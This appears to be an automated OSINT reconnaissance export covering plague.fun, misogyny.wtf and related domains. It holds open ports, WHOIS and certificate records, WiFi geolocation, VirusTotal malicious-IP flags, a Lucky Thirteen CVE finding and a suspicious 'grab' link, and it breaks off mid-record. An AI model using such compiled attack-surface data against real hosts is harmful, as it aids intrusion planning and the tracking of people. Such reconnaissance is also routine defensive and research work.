fe:ac:a8:3e:a2:86:2b:2b:f1:cd:c9:00:51:71:fa:b7:4a rasputain.fr
2022-12-18 00:09:52 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.96.20:8080 188.114.96.0/24
2022-12-18 00:16:46 Co-Hosted Site No ThreatMiner 0 0 2 0 None ecuapichin--ecuapichin.repl.co 34.149.204.188
2022-12-18 00:12:16 Raw Data from RIRs No ipapi.co 0 0 2 0 None {u'region_code': u'NJ', u'country_tld': u'.us', u'ip': u'2606:4700:3032::ac43:be81', u'currency_name': u'Dollar', u'currency': u'USD', u'country_population': 327167434, u'country_code': u'US', u'timezone': u'America/New_York', u'city': u'Newark', u'network': u'2606:4700:3030::/44', u'languages': u'en-US,es-US,haw,fr', u'version': u'IPv6', u'latitude': 40.7641, u'in_eu': False, u'utc_offset': u'-0500', u'continent_code': u'NA', u'country_name': u'United States', u'country_capital': u'Washington', u'org': u'CLOUDFLARENET', u'postal': u'07104', u'asn': u'AS13335', u'country': u'US', u'region': u'New Jersey', u'longitude': -74.1654, u'country_calling_code': u'+1', u'country_area': 9629091.0, u'country_code_iso3': u'USA'} 2606:4700:3032::ac43:be81
2022-12-18 00:04:11 SSL Certificate - Issued by No SSL Certificate Analyzer 0 0 2 0 None C=US,O=Cloudflare\, Inc.,CN=Cloudflare Inc ECC CA-3 188.114.96.1
2022-12-18 00:18:29 Internet Name No DNS Resolver 0 0 3 0 None webmail.zerotwo-best-waifu.online [{u'request_config': {u'headers': {u'User-Agent': u'Mozilla/5.0'}}, u'target': u'http://webmail.zerotwo-best-waifu.online', u'http_status': 200, u'plugins': {u'JQuery': {u'version': [u'3.5.0']}, u'Script': {u'string': [u'text/javascript']}, u'Country': {u'string': [u'ITALY'], u'module': [u'IT']}, u'Title': {u'string': [u'Not configured webmail']}, u'HTML5': {}, u'IP': {u'string': [u'81.88.48.102']}, u'X-Frame-Options': {u'string': [u'SAMEORIGIN']}}}, {}]
2022-12-18 00:26:57 Physical Location No MetaDefender 0 0 2 0 None San Francisco, United States 172.67.169.215
2022-12-18 00:08:38 Open TCP Port No LeakIX 0 0 1 0 None 20.195.209.219:80 20.195.209.219
2022-12-18 00:22:14 Open TCP Port No Censys 0 0 2 0 None 172.67.169.215:2082 172.67.169.215
2022-12-18 00:08:02 Similar Domain Yes TLD Searcher 1 0 1 0 None plague.it plague.fun
2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None Twist Studio (Net ID: 00:02:2D:07:96:23) 37.780462,-122.390564
2022-12-18 00:09:48 Co-Hosted Site No HackerTarget 0 0 2 0 None autodiscover.theerathornnft.com 172.67.147.230
2022-12-18 00:08:56 Open TCP Port No LeakIX 0 0 2 0 None 188.114.96.0:80 188.114.96.0
2022-12-18 00:21:17 Open TCP Port No Censys 0 0 2 0 None 188.114.96.1:80 188.114.96.1
2022-12-18 00:03:34 Affiliate - Internet Name No DNS Resolver 0 0 3 0 None lhcp3238.webapps.net 81.88.52.238
2022-12-18 00:24:06 Affiliate - Email Address No E-Mail Address Extractor 0 0 5 0 None z22lglbqy5igu1vav@registerprivateregistration.com Domain Name: SETUPDNS.NET Registry Domain ID: 1581585796_DOMAIN_NET-VRSN Registrar WHOIS Server: whois.register.it Registrar URL: http://www.register.it Updated Date: 2022-01-13T08:14:30Z Creation Date: 2010-01-12T13:36:45Z Registry Expiry Date: 2023-01-12T13:36:45Z Registrar: Register SPA Registrar IANA ID: 168 Registrar Abuse Contact Email: abuse@register.it Registrar Abuse Contact Phone: +39.05520021555 Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited Name Server: NS1.REGISTER.IT Name Server: NS2.REGISTER.IT DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of whois database: 2022-12-18T00:22:01Z <<< For more information on Whois status codes, please visit https://icann.org/epp NOTICE: The expiration date displayed in this record is the date the registrar's sponsorship of the domain name registration in the registry is currently set to expire. This date does not necessarily reflect the expiration date of the domain name registrant's agreement with the sponsoring registrar. Users may consult the sponsoring registrar's Whois database to view the registrar's reported date of expiration for this registration. TERMS OF USE: You are not authorized to access or query our Whois database through the use of electronic processes that are high-volume and automated except as reasonably necessary to register domain names or modify existing registrations; the Data in VeriSign Global Registry Services' ("VeriSign") Whois database is provided by VeriSign for information purposes only, and to assist persons in obtaining information about or related to a domain name registration record. VeriSign does not guarantee its accuracy. By submitting a Whois query, you agree to abide by the following terms of use: You agree that you may use this Data only for lawful purposes and that under no circumstances will you use this Data to: (1) allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via e-mail, telephone, or facsimile; or (2) enable high volume, automated, electronic processes that apply to VeriSign (or its computer systems). The compilation, repackaging, dissemination or other use of this Data is expressly prohibited without the prior written consent of VeriSign. You agree not to use electronic processes that are automated and high-volume to access or query the Whois database except as reasonably necessary to register domain names or modify existing registrations. VeriSign reserves the right to restrict your access to the Whois database in its sole discretion to ensure operational stability. VeriSign may restrict or terminate your access to the Whois database for failure to abide by these terms of use. VeriSign reserves the right to modify these terms at any time. The Registry database contains ONLY .COM, .NET, .EDU domains and Registrars. Domain Name: SETUPDNS.NET Registry Domain ID: 1581585796_DOMAIN_NET-VRSN Registrar WHOIS Server: whois.register.it Registrar URL: http://we.register.it Updated Date: 2022-02-14T00:00:00Z Creation Date: 2010-01-12T00:00:00Z Registrar Registration Expiration Date: 2023-01-12T00:00:00Z Registrar: REGISTER S.P.A. Registrar IANA ID: 168 Registrar Abuse Contact Email: abuse@register.it Registrar Abuse Contact Phone: +39.05520021555 Reseller: Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited Registry Registrant ID: Registrant Name: Global Domain Privacy Registrant Organization: GLOBAL DOMAIN PRIVACY Registrant Street: Via Zanchi 22 Registrant City: Bergamo Registrant State/Province: BG Registrant Postal Code: 24126 Registrant Country: IT Registrant Phone: +39.353230400 Registrant Phone Ext: Registrant Fax: +39.353230312 Registrant Fax Ext: Registrant Email: z22lglbqy5igu1vav@registerprivateregistration.com Registry Admin ID: Admin Name: Global Domain Privacy Admin Organization: GLOBAL DOMAIN PRIVACY Admin Street: Via Zanchi 22 Admin City: Bergamo Admin State/Province: BG Admin Postal Code: 24126 Admin Country: IT Admin Phone: +39.353230400 Admin Phone Ext: Admin Fax: +39.353230312 Admin Fax Ext: Admin Email: z22lglbqy5igu1vav@registerprivateregistration.com Registry Tech ID: Tech Name: Global Domain Privacy Tech Organization: GLOBAL DOMAIN PRIVACY Tech Street: Via Zanchi 22 Tech City: Bergamo Tech State/Province: BG Tech Postal Code: 24126 Tech Country: IT Tech Phone: +39.353230400 Tech Phone Ext: Tech Fax: +39.353230312 Tech Fax Ext: Tech Email: private@register.it Name Server: NS1.REGISTER.IT Name Server: NS2.REGISTER.IT DNSSEC: unsigned URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ >>> Last update of whois database: 2022-12-18T00:22:21Z <<< For more information on Whois status codes, please visit https://icann.org/epp
2022-12-18 00:16:46 Co-Hosted Site No ThreatMiner 0 0 2 0 None webpersonaspichincha1--webpichinch.repl.co 34.149.204.188
2022-12-18 00:16:49 Malicious IP Address Yes VirusTotal 0 1 1 0 None VirusTotal [51.103.210.236] https://www.virustotal.com/en/ip-address/51.103.210.236/information/ 51.103.210.236
2022-12-18 00:11:20 Vulnerability - CVE Low Yes Tool - testssl.sh 0 1 2 0 None CVE-2013-0169 https://nvd.nist.gov/vuln/detail/CVE-2013-0169 Score: 2.6 Description: The TLS protocol 1.1 and 1.2 and the DTLS protocol 1.0 and 1.2, as used in OpenSSL, OpenJDK, PolarSSL, and other products, do not properly consider timing side-channel attacks on a MAC check requirement during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, aka the "Lucky Thirteen" issue. Per http://www.openssl.org/news/vulnerabilities.html: Fixed in OpenSSL 1.0.1d (Affected 1.0.1c, 1.0.1b, 1.0.1a, 1.0.1) Fixed in OpenSSL 1.0.0k (Affected 1.0.0j, 1.0.0i, 1.0.0g, 1.0.0f, 1.0.0e, 1.0.0d, 1.0.0c, 1.0.0b, 1.0.0a, 1.0.0) Fixed in OpenSSL 0.9.8y (Affected 0.9.8x, 0.9.8w, 0.9.8v, 0.9.8u, 0.9.8t, 0.9.8s, 0.9.8r, 0.9.8q, 0.9.8p, 0.9.8o, 0.9.8n, 0.9.8m, 0.9.8l, 0.9.8k, 0.9.8j, 0.9.8i, 0.9.8h, 0.9.8g, 0.9.8f, 0.9.8d, 0.9.8c, 0.9.8b, 0.9.8a, 0.9.8) Affected users should upgrade to OpenSSL 1.0.1e, 1.0.0k or 0.9.8y (The fix in 1.0.1d wasn't complete, so please use 1.0.1e or later) 188.114.97.1
2022-12-18 00:21:54 Open TCP Port No Censys 0 0 2 0 None 104.21.7.179:8880 104.21.7.179
2022-12-18 00:03:24 Affiliate - Internet Name No DNS Resolver 0 0 3 0 None 180.204.149.34.bc.googleusercontent.com 34.149.204.180
2022-12-18 00:03:06 Internet Name - Unresolved No DNS Resolver 0 0 2 0 None plague.fun CN=*.plague.fun
2022-12-18 00:43:16 Malicious IP Address Yes VirusTotal 0 0 3 0 None VirusTotal [188.114.96.20] https://www.virustotal.com/en/ip-address/188.114.96.20/information/ 188.114.96.0/24
2022-12-18 00:08:45 Internet Name - Unresolved No DNS Resolver 0 0 2 0 None plague.fun {u'Services': [{u'protocol': u'https', u'event_type': u'service', u'ip': u'188.114.96.3', u'vendor': u'', u'port': u'443', u'transport': [u'tcp', u'tls', u'http'], u'event_source': u'HttpPlugin', u'network': {u'organization_name': u'CLOUDFLARENET', u'asn': 13335, u'network': u'188.114.96.0/22'}, u'service': {u'credentials': {u'username': u'', u'raw': None, u'password': u'', u'noauth': False, u'key': u''}, u'software': {u'modules': None, u'version': u'', u'os': u'', u'name': u'cloudflare', u'fingerprint': u''}}, u'event_fingerprint': u'6d1f2e7c9ee98731b5c07e2a0605f5df67b41e33bc1553b0a055e42aa7d864fa', u'leak': {u'dataset': {u'files': 0, u'rows': 0, u'ransom_notes': None, u'infected': False, u'collections': 0, u'size': 0}, u'type': u'', u'severity': u'', u'stage': u''}, u'event_pipeline': [u'CertStream', u'l9scan', u'tcpid', u'HttpPlugin'], u'http': {u'status': 0, u'title': u'404 Not Found', u'url': u'', u'header': {u'server': u'cloudflare'}, u'length': 0, u'favicon_hash': u'', u'root': u''}, u'tags': [], u'ssl': {u'cypher_suite': u'TLS_AES_128_GCM_SHA256', u'jarm': u'00000000000000000000000000000000000000000000000000000000000000', u'certificate': {u'domain': [u'*.plague.fun', u'plague.fun'], u'cn': u'*.plague.fun', u'valid': True, u'not_after': u'2023-01-28T18:19:30Z', u'key_size': 256, u'issuer_name': u'E1', u'fingerprint': u'c8334a1e1d54310e254140e075b554abf7eb6eee3a8330536bfb363810204efa', u'key_algo': u'ECDSA', u'not_before': u'2022-10-30T18:19:31Z'}, u'enabled': True, u'detected': False, u'version': u'TLSv1.3'}, u'mac': u'', u'ssh': {u'motd': u'', u'version': 0, u'banner': u'', u'fingerprint': u''}, u'reverse': u'', u'geoip': {u'region_iso_code': u'NL-NH', u'country_iso_code': u'NL', u'city_name': u'Amsterdam', u'location': {u'lat': 52.3759, u'lon': 4.8975}, u'country_name': u'Netherlands', u'continent_name': u'Europe', u'region_name': u'North Holland'}, u'host': u'atlas.plague.fun', u'summary': u'Date: Fri, 04 Nov 2022 14:12:30 GMT\r\nContent-Type: text/html; charset=utf-8\r\nTransfer-Encoding: chunked\r\nConnection: close\r\nexpect-ct: max-age=2592000, report-uri="https://sentry.repl.it/api/10/security/?sentry_key=615192fd532445bfbbbe966cd7131791"\r\nreplit-cluster: global\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {"endpoints":[{"url":"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=6ClqhVn5nSDtkklqr%2BmnSCvD9r8PWQF%2F88kiAg2dn43%2F57%2B43abjyeldwgPSlVgPWGi3Lnc3kXWmGp3tptIEJ4%2F6XT%2FcyMqiw%2FdFJnk7r%2FEt7i4KjB2lSsRxWQP2Geqr%2F2Jf"}],"group":"cf-nel","max_age":604800}\r\nNEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}\r\nServer: cloudflare\r\nCF-RAY: 764df1e8095ab83a-AMS\r\nalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400\r\n\nPage title: 404 Not Found\n\ncf\r\n\n\n404 Not Found\n Not Found \n The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again. \n\r\n0\r\n\r\n', u'time': u'2022-11-04T14:12:29.195922804Z'}, {u'protocol': u'https', u'event_type': u'service', u'ip': u'188.114.97.9', u'vendor': u'', u'port': u'443', u'transport': [u'tcp', u'tls', u'http'], u'event_source': u'HttpPlugin', u'network': {u'organization_name': u'CLOUDFLARENET', u'asn': 13335, u'network': u'188.114.96.0/22'}, u'service': {u'credentials': {u'username': u'', u'raw': None, u'password': u'', u'noauth': False, u'key': u''}, u'software': {u'modules': None, u'version': u'', u'os': u'', u'name': u'cloudflare', u'fingerprint': u''}}, u'event_fingerprint': u'6d1f2e7c9ee987310280cb7d632b5845847c2f419e2c9ddaaedfc99512844cb8', u'leak': {u'dataset': {u'files': 0, u'rows': 0, u'ransom_notes': None, u'infected': False, u'collections': 0, u'size': 0}, u'type': u'', u'severity': u'', u'stage': u''}, u'event_pipeline': [u'CertStream', u'l9scan', u'tcpid', u'HttpPlugin'], u'http': {u'status': 0, u'title': u'', u'url': u'', u'header': {u'content-length': u'73', u'server': u'cloudflare'}, u'length': 0, u'favicon_hash': u'', u'root': u''}, u'tags': [], u'ssl': {u'cypher_suite': u'TLS_AES_128_GCM_SHA256', u'jarm': u'00000000000000000000000000000000000000000000000000000000000000', u'certificate': {u'domain': [u'*.plague.fun', u'plague.fun'], u'cn': u'*.plague.fun', u'valid': True, u'not_after': u'2022-11-30T17:51:41Z', u'key_size': 256, u'issuer_name': u'E1', u'fingerprint': u'bbb95c587c22383e98c0c76edbbfd861351749a07ae39c9d4d43a5aee78540b7', u'key_algo': u'ECDSA', u'not_before': u'2022-09-01T17:51:42Z'}, u'enabled': True, u'detected': False, u'version': u'TLSv1.3'}, u'mac': u'', u'ssh': {u'motd': u'', u'version': 0, u'banner': u'', u'fingerprint': u''}, u'reverse': u'', u'geoip': {u'region_iso_code': u'NL-NH', u'country_iso_code': u'NL', u'city_name': u'Amsterdam', u'location': {u'lat': 52.3759, u'lon': 4.8975}, u'country_name': u'Netherlands', u'continent_name': u'Europe', u'region_name': u'North Holland'}, u'host': u'api.plague.fun', u'summary': u'Date: Sun, 23 Oct 2022 16:38:46 GMT\r\nContent-Type: text/plain; charset=utf-8\r\nContent-Length: 73\r\nConnection: close\r\naccess-control-allow-origin: *\r\nexpect-ct: max-age=2592000, report-uri="https://sentry.repl.it/api/10/security/?sentry_key=615192fd532445bfbbbe966cd7131791"\r\nreplit-cluster: global\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {"endpoints":[{"url":"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=wmCFw%2FYqj8604vOuoCeM2hBuifGq6KtOhHeKBOWsRA%2B54NPwmSqyfGIPk6jRMMW5tGyxQs7ve%2BDWPe8fFcjhv%2Fa9mWikvGufQUCzHDENLFGws4wis6UMHPbfqGd6lapb9w%3D%3D"}],"group":"cf-nel","max_age":604800}\r\nNEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}\r\nServer: cloudflare\r\nCF-RAY: 75ebe7a87fadcaa9-HAM\r\nalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400\r\n\n\n# Roses are red\n\n# Violets are blue\n\n# You are a skid\n\n# Nobody likes you', u'time': u'2022-10-23T16:38:44.953959619Z'}, {u'protocol': u'http', u'event_type': u'service', u'ip': u'2a06:98c1:3120::3', u'vendor': u'', u'port': u'80', u'transport': [u'tcp', u'http'], u'event_source': u'HttpPlugin', u'network': {u'organization_name': u'CLOUDFLARENET', u'asn': 13335, u'network': u'2a06:98c1:3120:0:0:0:0:0/46'}, u'service': {u'credentials': {u'username': u'', u'raw': None, u'password': u'', u'noauth': False, u'key': u''}, u'software': {u'modules': None, u'version': u'', u'os': u'', u'name': u'cloudflare', u'fingerprint': u''}}, u'event_fingerprint': u'6d1f2e7c9ee98731735c0f301524bacadf25fc68625d295855d87ce36c4e05e9', u'leak': {u'dataset': {u'files': 0, u'rows': 0, u'ransom_notes': None, u'infected': False, u'collections': 0, u'size': 0}, u'type': u'', u'severity': u'', u'stage': u''}, u'event_pipeline': [u'CertStream', u'l9scan', u'tcpid', u'HttpPlugin'], u'http': {u'status': 0, u'title': u'', u'url': u'', u'header': {u'location': u'https://plague.fun/', u'server': u'cloudflare'}, u'length': 0, u'favicon_hash': u'', u'root': u''}, u'tags': [], u'ssl': {u'cypher_suite': u'', u'jarm': u'', u'certificate': {u'domain': None, u'cn': u'', u'valid': False, u'not_after': u'0001-01-01T00:00:00Z', u'key_size': 0, u'issuer_name': u'', u'fingerprint': u'', u'key_algo': u'', u'not_before': u'0001-01-01T00:00:00Z'}, u'enabled': False, u'detected': False, u'version': u''}, u'mac': u'', u'ssh': {u'motd': u'', u'version': 0, u'banner': u'', u'fingerprint': u''}, u'reverse': u'', u'geoip': {u'region_iso_code': u'', u'country_iso_code': u'US', u'city_name': u'', u'location': {u'lat': 37.751, u'lon': -97.822}, u'country_name': u'United States', u'continent_name': u'North America', u'region_name': u''}, u'host': u'plague.fun', u'summary': u'Date: Sun, 30 Oct 2022 19:20:51 GMT\r\nTransfer-Encoding: chunked\r\nConnection: close\r\nCache-Control: max-age=3600\r\nExpires: Sun, 30 Oct 2022 20:20:51 GMT\r\nLocation: https://plague.fun/\r\nReport-To: {"endpoints":[{"url":"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=p0niSQHcHJYrt94pMK%2FWr74YUZs%2BvcDsHR4GVggs7kEqo8GFbUOH1p8yewavJYpzdeRdgmQf7L%2B0bs%2B3tFNCNgz%2Fk3qh0PO2FjpU4p6sNMeUApthX75f68Yi1FZpoayqhhh1HsoOYqPg"}],"group":"cf-nel","max_age":604800}\r\nNEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}\r\nServer: cloudflare\r\nCF-RAY: 762682b70a0ccabd-HAM\r\nalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400\r\n\n\n0\r\n\r\n', u'time': u'2022-10-30T19:20:50.988305392Z'}, {u'protocol': u'https', u'event_type': u'service', u'ip': u'188.114.97.3', u'vendor': u'', u'port': u'443', u'transport': [u'tcp', u'tls', u'http'], u'event_source': u'HttpPlugin', u'network': {u'organization_name': u'CLOUDFLARENET', u'asn': 13335, u'network': u'188.114.96.0/22'}, u'service': {u'credentials': {u'username': u'', u'raw': None, u'password': u'', u'noauth': False, u'key': u''}, u'software': {u'modules': None, u'version': u'', u'os': u'', u'name': u'cloudflare', u'fingerprint': u''}}, u'event_fingerprint': u'6d1f2e7c9ee98731b5c07e2a0605f5df67b41e33c3c26f3899c099bd7684b50a', u'leak': {u'dataset': {u'files': 0, u'rows': 0, u'ransom_notes': None, u'infected': False, u'collections': 0, u'size': 0}, u'type': u'', u'severity': u'', u'stage': u''}, u'event_pipeline': [u'CertStream', u'l9scan', u'tcpid', u'HttpPlugin'], u'http': {u'status': 0, u'title': u'Plague', u'url': u'', u'header': {u'server': u'cloudflare'}, u'length': 0, u'favicon_hash': u'', u'root': u''}, u'tags': [], u'ssl': {u'cypher_suite': u'TLS_AES_128_GCM_SHA256', u'jarm': u'00000000000000000000000000000000000000000000000000000000000000', u'certificate': {u'domain': [u'*.plague.fun', u'plague.fun'], u'cn': u'*.plague.fun', u'valid': True, u'not_after': u'2023-01-28T18:19:30Z', u'key_size': 256, u'issuer_name': u'E1', u'fingerprint': u'c8334a1e1d54310e254140e075b554abf7eb6eee3a8330536bfb363810204efa', u'key_algo': u'ECDSA', u'not_before': u'2022-10-30T18:19:31Z'}, u'enabled': True, u'detected': False, u'version': u'TLSv1.3'}, u'mac': u'', u'ssh': {u'motd': u'', u'version': 0, u'banner': u'', u'fingerprint': u''}, u'reverse': u'', u'geoip': {u'region_iso_code': u'NL-NH', u'country_iso_code': u'NL', u'city_name': u'Amsterdam', u'location': {u'lat': 52.3759, u'lon': 4.8975}, u'country_name': u'Netherlands', u'continent_name': u'Europe', u'region_name': u'North Holland'}, u'host': u'plague.fun', u'summary': u'Date: Sun, 30 Oct 2022 19:20:51 GMT\
2022-12-18 00:05:13 Linked URL - Internal No Hybrid Analysis 0 0 2 0 None http://misogyny.wtf/grab/UsRjS959Rqm4sPG4 20.226.83.185
2022-12-18 00:06:35 Open TCP Port No Pulsedive 0 0 2 0 None 188.114.97.0:8080 188.114.97.0
2022-12-18 00:16:52 Software Used Yes Tool - Wappalyzer 0 0 2 0 None Sectigo webmail.zerotwo-best-waifu.online
2022-12-18 00:07:01 SSL Certificate - Raw Data No Certificate Transparency 1 0 1 0 None Certificate: Data: Version: 3 (0x2) Serial Number: 04:3b:c1:da:8c:2d:8d:3c:49:c8:fb:3d:44:b5:c2:87:b4:3a Signature Algorithm: ecdsa-with-SHA384 Issuer: C=US, O=Let's Encrypt, CN=E1 Validity Not Before: Sep 20 20:09:20 2022 GMT Not After : Dec 19 20:09:19 2022 GMT Subject: CN=*.misogyny.wtf Subject Public Key Info: Public Key Algorithm: id-ecPublicKey Public-Key: (256 bit) pub: 04:9e:35:88:49:0b:b7:05:fb:30:39:91:2c:a4:c8: 3d:37:20:a3:92:d0:d2:11:82:4f:c7:bd:e3:16:9d: be:3d:3f:14:1f:c4:fd:44:00:d3:22:0e:0a:15:80: 32:c2:39:da:b8:ae:34:4f:14:01:a5:16:f7:6e:eb: 30:0a:c1:cc:d2 ASN1 OID: prime256v1 NIST CURVE: P-256 X509v3 extensions: X509v3 Key Usage: critical Digital Signature X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: 88:24:DF:9C:20:E2:63:56:23:30:02:EA:37:31:97:44:FC:90:64:46 X509v3 Authority Key Identifier: keyid:5A:F3:ED:2B:FC:36:C2:37:79:B9:52:30:EA:54:6F:CF:55:CB:2E:AC Authority Information Access: OCSP - URI:http://e1.o.lencr.org CA Issuers - URI:http://e1.i.lencr.org/ X509v3 Subject Alternative Name: DNS:*.misogyny.wtf, DNS:misogyny.wtf X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org CT Precertificate Poison: critical NULL Signature Algorithm: ecdsa-with-SHA384 30:64:02:30:2c:85:5d:bb:57:90:dc:e7:0e:c1:fb:19:64:4d: ed:ef:1a:0f:25:57:66:e4:78:e3:5f:76:69:98:83:4f:9e:d6: 0e:92:0e:dc:62:fc:84:10:12:13:a6:68:99:e0:70:95:02:30: 43:a3:8d:79:ff:59:63:32:3d:8c:92:53:12:59:3a:b1:60:01: 58:91:c2:32:0d:d7:e9:cb:b7:70:ff:a3:a2:56:80:bd:93:6a: 54:5c:52:12:8b:bd:3b:4e:9b:aa:4c:e2 misogyny.wtf
2022-12-18 00:09:32 Co-Hosted Site No HackerTarget 0 0 2 0 None distighrufcirawsdisr.tk 104.21.28.240
2022-12-18 00:21:20 HTTP Headers No Censys 0 0 2 0 None {"Content_Length": ["151"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Cf_Ray": ["77a96313b8e390fe-FRA"], "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Date": [""]} 188.114.97.1
2022-12-18 00:20:49 Netblock Membership No Censys 0 0 1 0 None 51.103.0.0/16 51.103.210.236
2022-12-18 00:03:11 Affiliate - IP Address No DNS Look-aside 2 0 2 0 None 81.88.52.241 81.88.52.232
2022-12-18 00:02:55 IP Address No Mnemonic PassiveDNS 42 0 1 0 None 81.88.52.232 zerotwo-best-waifu.online
2022-12-18 00:02:56 SSL Certificate - Raw Data No Certificate Transparency 1 0 1 0 None Certificate: Data: Version: 3 (0x2) Serial Number: 04:50:42:ff:9a:7a:0a:ec:db:51:55:79:18:dd:8f:ed:52:b0 Signature Algorithm: sha256WithRSAEncryption Issuer: C=US, O=Let's Encrypt, CN=R3 Validity Not Before: Jan 8 17:50:30 2022 GMT Not After : Apr 8 17:50:29 2022 GMT Subject: CN=*.plague.fun Subject Public Key Info: Public Key Algorithm: rsaEncryption RSA Public-Key: (2048 bit) Modulus: 00:ac:b0:17:a9:7b:51:da:31:7f:8f:00:19:b7:3b: 98:64:90:41:83:01:ae:da:c8:aa:ac:d4:17:62:2b: f9:44:4e:05:5a:c8:20:ef:dc:a2:f3:45:78:3a:ed: af:b0:2e:06:e9:62:bd:f4:43:71:b4:d3:b3:eb:3a: 9b:77:69:ad:57:fc:60:7d:16:9c:b5:f7:25:94:e1: d6:18:0a:b4:34:e5:56:64:cc:e2:54:4f:50:e0:38: 81:9d:d7:46:81:ca:56:b5:53:ad:f7:4c:ec:d0:48: 14:8e:09:3d:e6:af:c3:a5:c9:12:3c:1d:64:d4:9c: c3:59:ad:d4:5a:90:12:14:ee:34:d6:07:da:98:71: 90:50:14:13:80:f5:4a:58:eb:3a:b7:cf:cc:11:3d: 17:0b:fd:11:95:39:4c:00:a7:3e:c8:28:36:88:a4: 5a:c3:63:19:a5:30:8d:fb:f6:75:72:a1:28:62:08: ad:b5:a6:ec:e6:7c:06:10:f1:0e:9d:91:27:6a:1f: 94:91:88:4b:5b:e5:39:a6:d1:08:1c:fe:26:bf:6d: 75:5a:be:c5:92:fe:2c:75:45:5f:45:87:11:0e:32: 54:cc:4c:c8:27:b5:05:6f:bc:c5:7b:a3:f9:a5:6e: eb:b2:1c:a1:62:b9:c5:09:cd:81:eb:42:27:b7:b3: 09:af Exponent: 65537 (0x10001) X509v3 extensions: X509v3 Key Usage: critical Digital Signature, Key Encipherment X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: 5A:40:9D:CB:29:61:19:0B:49:48:24:70:A0:AC:F1:60:B9:77:E4:E6 X509v3 Authority Key Identifier: keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6 Authority Information Access: OCSP - URI:http://r3.o.lencr.org CA Issuers - URI:http://r3.i.lencr.org/ X509v3 Subject Alternative Name: DNS:*.plague.fun, DNS:plague.fun X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org CT Precertificate SCTs: Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 29:79:BE:F0:9E:39:39:21:F0:56:73:9F:63:A5:77:E5: BE:57:7D:9C:60:0A:F8:F9:4D:5D:26:5C:25:5D:C7:84 Timestamp : Jan 8 18:50:31.079 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:45:02:21:00:8A:ED:1F:02:55:07:04:9B:33:8A:18: 9E:EC:35:86:59:0D:51:53:39:C3:BB:CC:BA:B4:73:87: 9B:09:AF:10:EC:02:20:0C:21:C1:58:B9:D7:D0:11:02: 53:1B:55:34:76:64:E6:F0:77:DB:72:E8:17:F2:55:75: EA:77:35:10:C3:E9:2B Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 6F:53:76:AC:31:F0:31:19:D8:99:00:A4:51:15:FF:77: 15:1C:11:D9:02:C1:00:29:06:8D:B2:08:9A:37:D9:13 Timestamp : Jan 8 18:50:31.428 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:44:02:20:4B:56:BC:EE:D0:F8:1A:2B:3F:80:F9:7E: 97:8D:72:37:04:9C:3B:A1:90:56:11:BD:DA:1A:00:5D: 17:6A:21:7E:02:20:58:96:51:0D:94:2E:16:50:61:E8: 7C:92:97:45:2D:D9:92:71:00:CA:64:D8:4C:49:D5:01: 9B:CC:4E:EA:8D:9D Signature Algorithm: sha256WithRSAEncryption 2c:00:7d:72:58:4f:d1:2f:6c:10:e5:f1:b0:20:f7:03:55:a0: 76:08:e4:be:c1:4d:8c:a9:01:c3:9c:31:29:8b:67:61:92:af: 7f:01:a7:98:77:9d:41:9b:c6:6a:a7:d4:87:b0:c6:2a:6e:b2: 93:a8:59:22:29:14:c8:c4:1c:b8:85:56:bd:a3:04:4a:a6:7c: 5a:3d:fc:76:55:4e:2b:05:58:c7:a6:e2:8c:25:27:c5:b2:a4: 7b:2e:58:c7:6b:bd:23:e1:30:bb:5e:18:f7:82:24:69:da:f7: 95:a3:a6:2a:18:55:00:b9:54:08:f8:d3:d5:35:2f:98:a2:7c: 0d:a4:4b:12:9b:8b:6a:31:87:72:1f:09:83:a3:3a:33:8f:a6: 6b:ce:27:fc:0e:38:13:77:f9:79:f9:ca:d2:f2:0f:36:2b:c8: 23:28:38:4b:eb:8e:db:6e:b9:36:48:d9:d5:08:13:77:19:4d: 06:ca:4f:72:22:42:f3:bd:35:78:01:0f:a6:cd:3a:29:b4:49: 